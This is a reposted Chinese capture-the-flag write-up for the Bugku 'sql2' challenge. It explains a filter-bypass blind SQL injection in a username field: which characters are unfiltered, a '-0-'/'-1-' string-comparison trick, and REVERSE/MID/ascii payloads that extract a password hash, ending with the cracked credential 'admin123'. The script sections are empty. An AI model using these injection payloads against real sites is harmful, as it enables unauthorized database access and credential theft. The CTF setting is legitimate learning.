转载自:http://hu3sky.ooo/2018/08/18/bugku%20sql2/
网上没有一个正常做出来了的
看了叶师傅的wp,跟着学一遍
username的注入,盲注
根据username的返回不同
fuzz,几乎都过滤完了。
没过滤的 !,!=,=,+,-,^,%
数字型时,可以用^进行闭合
and这些也被过滤。
需要用到-1-'admin'-1-'' = -1
'admin'-0-'' = 0
我们发现-0的时候,为true,-1的时候为false
那么这是为什么呢?
我们猜想后台sql语句构造为
$sql = select * from users where username=$username;
在字符串username的值和数字0比较的时候,字符串变为了0
故此0=0
构造语句
ascii(substr((select database()),1,1))>1
很多过滤了,这个语句没法使用
用到一个倒着截取
假设:
passwd=abc123
那么我们用以下方式
|
|
倒着看的第一位都是3,显然不行,无法截取出来,于是想到反转
先反转REVERSE(MID((passwd)from(-%d))
再去最后一位mid(REVERSE(MID((passwd)from(%-d)))from(-1))
在比较ASCIIascii(mid(REVERSE(MID((passwd)from(%-d)))from(-1)))>1
脚本
|
|
得到密码的md5值005b81fd960f61505237dbb7a3202910解码得到admin123
登录实时监控执行ls命令